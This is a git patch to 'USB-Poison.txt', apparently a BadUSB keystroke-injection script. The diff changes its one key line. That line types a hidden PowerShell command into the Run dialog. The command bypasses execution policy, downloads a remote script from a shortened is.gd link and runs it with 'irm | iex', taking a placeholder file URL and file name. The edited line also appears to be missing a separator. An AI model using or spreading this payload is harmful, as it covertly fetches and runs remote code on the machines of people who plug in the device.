From d3bf23e72b56bf2411bbad8ba38286de808aafc4 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Mon, 22 Jul 2024 11:14:50 +0000 Subject: [PATCH] Update USB-Poison.txt --- USB-Poison/USB-Poison.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/USB-Poison/USB-Poison.txt b/USB-Poison/USB-Poison.txt index c57ac92..ad2cbad 100644 --- a/USB-Poison/USB-Poison.txt +++ b/USB-Poison/USB-Poison.txt @@ -11,6 +11,6 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $url = 'YOUR_FILE_URL_HERE'; irm is.gd/usbpoison | iex +STRING powershell -NoP -Ep Bypass -W H -C $DLurl = 'YOUR_FILE_URL_HERE'; $File = 'NAME_OF_FILE_TO_COPY' irm is.gd/usbpoison | iex ENTER